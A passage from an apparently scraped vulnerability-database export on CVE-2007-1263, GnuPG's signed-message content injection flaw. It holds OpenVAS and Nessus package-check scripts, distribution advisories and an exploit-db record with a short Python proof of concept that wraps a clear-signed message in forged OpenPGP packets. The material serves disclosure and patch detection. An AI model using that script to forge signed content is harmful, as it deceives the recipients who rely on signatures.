PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.58131\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2007-1263\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2007-066-01 gnupg\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(9\\.0|9\\.1|10\\.0|10\\.1|10\\.2|11\\.0)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2007-066-01\");\n\n script_tag(name:\"insight\", value:\"New gnupg packages are available for Slackware 9.0, 9.1, 10.0, 10.1, 10.2,\nand 11.0 to fix security ramifications of incorrect gpg usage.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2007-066-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"gnupg\", ver:\"1.4.7-i386-1_slack9.0\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"gnupg\", ver:\"1.4.7-i486-1_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"gnupg\", ver:\"1.4.7-i486-1_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"gnupg\", ver:\"1.4.7-i486-1_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"gnupg\", ver:\"1.4.7-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"gnupg\", ver:\"1.4.7-i486-1_slack11.0\", rls:\"SLK11.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "slackware": [{"lastseen": "2020-10-25T16:36:18", "bulletinFamily": "unix", "cvelist": ["CVE-2007-1263"], "description": "New gnupg packages are available for Slackware 9.0, 9.1, 10.0, 10.1, 10.2,\nand 11.0 to fix security ramifications of incorrect gpg usage.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1263\n\nHere are the details from the Slackware 11.0 ChangeLog:\n\nn/gnupg-1.4.7-i486-1_slack11.0.tgz: Upgraded to gnupg-1.4.7.\n This fixes a security problem that can occur when GnuPG is used incorrectly.\n Newer versions attempt to prevent such misuse.\n For more information, see:\n http://lists.gnupg.org/pipermail/gnupg-announce/2007q1/000251.html\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\nfrom ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/gnupg-1.4.7-i386-1_slack9.0.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/gnupg-1.4.7-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/gnupg-1.4.7-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/gnupg-1.4.7-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/gnupg-1.4.7-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/gnupg-1.4.7-i486-1_slack11.0.tgz\n\n\nMD5 signatures:\n\nSlackware 9.0 package:\neac6b5e6084f602f2c4fa6091e850ade gnupg-1.4.7-i386-1_slack9.0.tgz\n\nSlackware 9.1 package:\n43638cd06c5f104287f53aa28b480718 gnupg-1.4.7-i486-1_slack9.1.tgz\n\nSlackware 10.0 package:\n7d293676a7c3c0b996d077293cb2a11c gnupg-1.4.7-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\n15eaf8b90a6589976d4bcb7611b84561 gnupg-1.4.7-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\n61a60aefa1dd6882c6561c0f9dc394f1 gnupg-1.4.7-i486-1_slack10.2.tgz\n\nSlackware 11.0 package:\naff7417fcfa53fc7dc0eb9a63097cc35 gnupg-1.4.7-i486-1_slack11.0.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg gnupg-1.4.7-i486-1_slack11.0.tgz", "modified": "2007-03-08T02:35:56", "published": "2007-03-08T02:35:56", "id": "SSA-2007-066-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.449060", "type": "slackware", "title": "[slackware-security] gnupg", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-1263"], "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://lists.gnupg.org/pipermail/gnupg-users/2007-March/030514.html)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20070301-01-P.asc)\nSecurity Tracker: 1017727\n[Secunia Advisory ID:24365](https://secuniaresearch.flexerasoftware.com/advisories/24365/)\n[Secunia Advisory ID:24420](https://secuniaresearch.flexerasoftware.com/advisories/24420/)\n[Secunia Advisory ID:24489](https://secuniaresearch.flexerasoftware.com/advisories/24489/)\n[Secunia Advisory ID:24650](https://secuniaresearch.flexerasoftware.com/advisories/24650/)\n[Secunia Advisory ID:24438](https://secuniaresearch.flexerasoftware.com/advisories/24438/)\n[Secunia Advisory ID:24511](https://secuniaresearch.flexerasoftware.com/advisories/24511/)\n[Secunia Advisory ID:24734](https://secuniaresearch.flexerasoftware.com/advisories/24734/)\n[Secunia Advisory ID:24875](https://secuniaresearch.flexerasoftware.com/advisories/24875/)\nOther Advisory URL: http://www.coresecurity.com/?action=item&id=1687\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-144.htm\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Mar/0008.html\nNews Article: http://news.com.com/Bug+may+expose+encrypted+e-mail/2100-1002_3-6165277.html\nMail List Post: http://seclists.org/bugtraq/2007/Mar/0058.html\nFrSIRT Advisory: ADV-2007-0835\n[CVE-2007-1263](https://vulners.com/cve/CVE-2007-1263)\nBugtraq ID: 22757\n", "edition": 1, "modified": "2007-03-05T00:00:00", "published": "2007-03-05T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:33501", "id": "OSVDB:33501", "title": "GnuPG / GPGME Unsigned OpenPGP Message Weakness", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "centos": [{"lastseen": "2019-12-20T18:27:23", "bulletinFamily": "unix", "cvelist": ["CVE-2007-1263"], "description": "**CentOS Errata and Security Advisory** CESA-2007:0106-01\n\n\nGnuPG is a utility for encrypting data and creating digital signatures.\r\n\r\nGerardo Richarte discovered that a number of applications that make use of\r\nGnuPG are prone to a vulnerability involving incorrect verification of\r\nsignatures and encryption. An attacker could add arbitrary content to a\r\nsigned message in such a way that a receiver of the message would not be\r\nable to distinguish between the properly signed parts of a message and the\r\nforged, unsigned, parts. (CVE-2007-1263)\r\n\r\nWhilst this is not a vulnerability in GnuPG itself, the GnuPG team have\r\nproduced a patch to protect against messages with multiple plaintext\r\npackets. Users should update to these erratum packages which contain the\r\nbackported patch for this issue.\r\n\r\nRed Hat would like to thank Core Security Technologies for reporting this\r\nissue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-March/025637.html\n\n**Affected packages:**\ngnupg\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 4, "modified": "2007-03-07T01:28:25", "published": "2007-03-07T01:28:25", "href": "http://lists.centos.org/pipermail/centos-announce/2007-March/025637.html", "id": "CESA-2007:0106-01", "title": "gnupg security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-08T03:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2007-1263"], "description": "**CentOS Errata and Security Advisory** CESA-2007:0106\n\n\nGnuPG is a utility for encrypting data and creating digital signatures.\r\n\r\nGerardo Richarte discovered that a number of applications that make use of\r\nGnuPG are prone to a vulnerability involving incorrect verification of\r\nsignatures and encryption. An attacker could add arbitrary content to a\r\nsigned message in such a way that a receiver of the message would not be\r\nable to distinguish between the properly signed parts of a message and the\r\nforged, unsigned, parts. (CVE-2007-1263)\r\n\r\nWhilst this is not a vulnerability in GnuPG itself, the GnuPG team have\r\nproduced a patch to protect against messages with multiple plaintext\r\npackets. Users should update to these erratum packages which contain the\r\nbackported patch for this issue.\r\n\r\nRed Hat would like to thank Core Security Technologies for reporting this\r\nissue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-March/025630.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-March/025631.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-March/025632.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-March/025634.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-March/025635.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-March/025636.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-March/025639.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-March/025640.html\n\n**Affected packages:**\ngnupg\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0106.html", "edition": 7, "modified": "2007-03-08T08:27:09", "published": "2007-03-06T11:23:21", "href": "http://lists.centos.org/pipermail/centos-announce/2007-March/025630.html", "id": "CESA-2007:0106", "title": "gnupg security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "suse": [{"lastseen": "2016-09-04T11:45:28", "bulletinFamily": "unix", "cvelist": ["CVE-2007-1263"], "description": "When printing a text stream with a GPG signature it was possible for an attacker to create a stream with \"unsigned text, signed text\" where both unsigned and signed text would be shown without distinction which one was signed and which part wasn't.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2007-03-30T16:10:46", "published": "2007-03-30T16:10:46", "id": "SUSE-SA:2007:024", "href": "http://lists.opensuse.org/opensuse-security-announce/2007-03/msg00005.html", "type": "suse", "title": "signature bypassing in gpg", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:45", "bulletinFamily": "unix", "cvelist": ["CVE-2007-1263"], "description": " [1.4.5-13]\n - incorporate patch from Werner to work around clients which\n can't tell that multiple plain messages have been processed (#230457) ", "edition": 4, "modified": "2007-06-26T00:00:00", "published": "2007-06-26T00:00:00", "id": "ELSA-2007-0107", "href": "http://linux.oracle.com/errata/ELSA-2007-0107.html", "title": "Important: gnupg security update ", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:30", "bulletinFamily": "unix", "cvelist": ["CVE-2007-1263"], "description": " [1.2.6-9]\n - incorporate backport of patch from Werner to work around clients which\n can't tell that multiple plain messages have been processed (#230456) ", "edition": 4, "modified": "2007-03-06T00:00:00", "published": "2007-03-06T00:00:00", "id": "ELSA-2007-0106", "href": "http://linux.oracle.com/errata/ELSA-2007-0106.html", "title": "Important: gnupg security update ", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:46:45", "bulletinFamily": "unix", "cvelist": ["CVE-2007-1263"], "description": "GnuPG is a utility for encrypting data and creating digital signatures.\r\n\r\nGerardo Richarte discovered that a number of applications that make use of\r\nGnuPG are prone to a vulnerability involving incorrect verification of\r\nsignatures and encryption. An attacker could add arbitrary content to a\r\nsigned message in such a way that a receiver of the message would not be\r\nable to distinguish between the properly signed parts of a message and the\r\nforged, unsigned, parts. (CVE-2007-1263)\r\n\r\nWhilst this is not a vulnerability in GnuPG itself, the GnuPG team have\r\nproduced a patch to protect against messages with multiple plaintext\r\npackets. Users should update to these erratum packages which contain the\r\nbackported patch for this issue.\r\n\r\nRed Hat would like to thank Core Security Technologies for reporting this\r\nissue.", "modified": "2017-09-08T12:11:04", "published": "2007-03-13T04:00:00", "id": "RHSA-2007:0107", "href": "https://access.redhat.com/errata/RHSA-2007:0107", "type": "redhat", "title": "(RHSA-2007:0107) Important: gnupg security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-08-13T18:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2007-1263"], "description": "GnuPG is a utility for encrypting data and creating digital signatures.\r\n\r\nGerardo Richarte discovered that a number of applications that make use of\r\nGnuPG are prone to a vulnerability involving incorrect verification of\r\nsignatures and encryption. An attacker could add arbitrary content to a\r\nsigned message in such a way that a receiver of the message would not be\r\nable to distinguish between the properly signed parts of a message and the\r\nforged, unsigned, parts. (CVE-2007-1263)\r\n\r\nWhilst this is not a vulnerability in GnuPG itself, the GnuPG team have\r\nproduced a patch to protect against messages with multiple plaintext\r\npackets. Users should update to these erratum packages which contain the\r\nbackported patch for this issue.\r\n\r\nRed Hat would like to thank Core Security Technologies for reporting this\r\nissue.", "modified": "2019-03-22T23:42:49", "published": "2007-03-06T05:00:00", "id": "RHSA-2007:0106", "href": "https://access.redhat.com/errata/RHSA-2007:0106", "type": "redhat", "title": "(RHSA-2007:0106) Important: gnupg security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-03T10:54:53", "description": "GnuPG 1.x Signed Message Arbitrary Content Injection Weakness. CVE-2007-1263. Remote exploit for linux platform", "published": "2007-03-05T00:00:00", "type": "exploitdb", "title": "GnuPG 1.x Signed Message Arbitrary Content Injection Weakness", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1263"], "modified": "2007-03-05T00:00:00", "id": "EDB-ID:29689", "href": "https://www.exploit-db.com/exploits/29689/", "sourceData": "source: http://www.securityfocus.com/bid/22757/info\r\n\r\nGnuPG is prone to a weakness that may allow an attacker to add arbitrary content into a message without the end user knowing.\r\n\r\nAn attacker may be able to exploit this issue in applications using GnuPG to add arbitrary content into a signed and/or encrypted message.\r\n\r\nExploiting this issue depends on the individual application's use of GnuPG. Individual records will be created detailing this issue in affected applications. \r\n\r\n#!/usr/bin/python\r\nimport os, gpg, sys, base64\r\n\r\nclear_sign = open(sys.argv[1], \"rb\").read().splitlines()\r\n\r\nstart = clear_sign.index(\"-----BEGIN PGP SIGNED MESSAGE-----\")\r\nmid = clear_sign.index(\"-----BEGIN PGP SIGNATURE-----\")\r\nend = clear_sign.index(\"-----END PGP SIGNATURE-----\")\r\n\r\ntext = '\\r\\n'.join(clear_sign[start+3:mid])\r\nsign = '\\n'.join(clear_sign[mid+3:end-1])\r\n\r\nonepass = gpg.OnePassSignature()\r\nonepass['keyid'] = (0x12341234,0x12341234)\r\nonepass['digest_algo'] = 2\r\nonepass['pubkey_algo'] = 1\r\nonepass['sigclass'] = 1\r\n\r\nplain1 = gpg.Plaintext()\r\nplain1['name'] = 'original'\r\nplain1['data'] = text\r\nplain1['mode'] = 0x62\r\n\r\nsignature = gpg.Raw()\r\nsignature['data'] = base64.decodestring(sign)\r\n\r\ncompressed = gpg.Compressed()\r\ncompressed['algorithm'] = gpg.COMPRESS_ALGO_ZLIB\r\ncompressed['data'] = [onepass, plain1, signature]\r\n\r\npkt = gpg.Packet()\r\npkt['version'] = 1\r\npkt['data'] = compressed\r\n\r\nos.write(1,str(pkt))\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/29689/"}], "nessus": [{"lastseen": "2021-01-06T09:44:45", "description": "Gerardo Richarte discovered that GnuPG, a free PGP replacement,\nprovides insufficient user feedback if an OpenPGP message contains\nboth unsigned and signed portions. Inserting text segments into an\notherwise signed message could be exploited to forge the content of\nsigned messages. This update prevents such attacks; the old behaviour\ncan still be activated by passing the --allow-multiple-messages\noption.", "edition": 24, "published": "2007-03-16T00:00:00", "title": "Debian DSA-1266-1 : gnupg - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "modified": "2007-03-16T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:gnupg"], "id": "DEBIAN_DSA-1266.NASL", "href": "https://www.tenable.com/plugins/nessus/24819", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1266. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24819);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2007-1263\");\n script_xref(name:\"DSA\", value:\"1266\");\n\n script_name(english:\"Debian DSA-1266-1 : gnupg - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Gerardo Richarte discovered that GnuPG, a free PGP replacement,\nprovides insufficient user feedback if an OpenPGP message contains\nboth unsigned and signed portions. Inserting text segments into an\notherwise signed message could be exploited to forge the content of\nsigned messages. This update prevents such attacks; the old behaviour\ncan still be activated by passing the --allow-multiple-messages\noption.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=413922\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=414170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2007/dsa-1266\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gnupg packages.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.4.1-1.sarge7.\n\nFor the upcoming stable distribution (etch) these problems have been\nfixed in version 1.4.6-2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gnupg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/03/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"gnupg\", reference:\"1.4.1-1.sarge7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T12:43:57", "description": "From Red Hat Security Advisory 2007:0107 :\n\nUpdated GnuPG packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nGnuPG is a utility for encrypting data and creating digital\nsignatures.\n\nGerardo Richarte discovered that a number of applications that make\nuse of GnuPG are prone to a vulnerability involving incorrect\nverification of signatures and encryption. An attacker could add\narbitrary content to a signed message in such a way that a receiver of\nthe message would not be able to distinguish between the properly\nsigned parts of a message and the forged, unsigned, parts.\n(CVE-2007-1263)\n\nWhilst this is not a vulnerability in GnuPG itself, the GnuPG team\nhave produced a patch to protect against messages with multiple\nplaintext packets. Users should update to these erratum packages which\ncontain the backported patch for this issue.\n\nRed Hat would like to thank Core Security Technologies for reporting\nthis issue.", "edition": 24, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : gnupg (ELSA-2007-0107)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:gnupg"], "id": "ORACLELINUX_ELSA-2007-0107.NASL", "href": "https://www.tenable.com/plugins/nessus/67460", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2007:0107 and \n# Oracle Linux Security Advisory ELSA-2007-0107 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67460);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-1263\");\n script_bugtraq_id(22757);\n script_xref(name:\"RHSA\", value:\"2007:0107\");\n\n script_name(english:\"Oracle Linux 5 : gnupg (ELSA-2007-0107)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2007:0107 :\n\nUpdated GnuPG packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nGnuPG is a utility for encrypting data and creating digital\nsignatures.\n\nGerardo Richarte discovered that a number of applications that make\nuse of GnuPG are prone to a vulnerability involving incorrect\nverification of signatures and encryption. An attacker could add\narbitrary content to a signed message in such a way that a receiver of\nthe message would not be able to distinguish between the properly\nsigned parts of a message and the forged, unsigned, parts.\n(CVE-2007-1263)\n\nWhilst this is not a vulnerability in GnuPG itself, the GnuPG team\nhave produced a patch to protect against messages with multiple\nplaintext packets. Users should update to these erratum packages which\ncontain the backported patch for this issue.\n\nRed Hat would like to thank Core Security Technologies for reporting\nthis issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-June/000236.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gnupg package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gnupg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"gnupg-1.4.5-13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnupg\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-20T15:42:21", "description": "USN-432-1 fixed a vulnerability in GnuPG. This update provides the\ncorresponding updates for GnuPG2 and the GPGME library.\n\nGerardo Richarte from Core Security Technologies discovered that when\ngnupg is used without --status-fd, there is no way to distinguish\ninitial unsigned messages from a following signed message. An attacker\ncould inject an unsigned message, which could fool the user into\nthinking the message was entirely signed by the original sender.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2007-11-10T00:00:00", "title": "Ubuntu 6.06 LTS / 6.10 : gnupg2, gpgme1.0 vulnerability (USN-432-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "modified": "2007-11-10T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:gnupg-agent", "p-cpe:/a:canonical:ubuntu_linux:gpgsm", "cpe:/o:canonical:ubuntu_linux:6.10", "p-cpe:/a:canonical:ubuntu_linux:libgpgme11", "p-cpe:/a:canonical:ubuntu_linux:libgpgme11-dev", "p-cpe:/a:canonical:ubuntu_linux:gnupg2", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-432-2.NASL", "href": 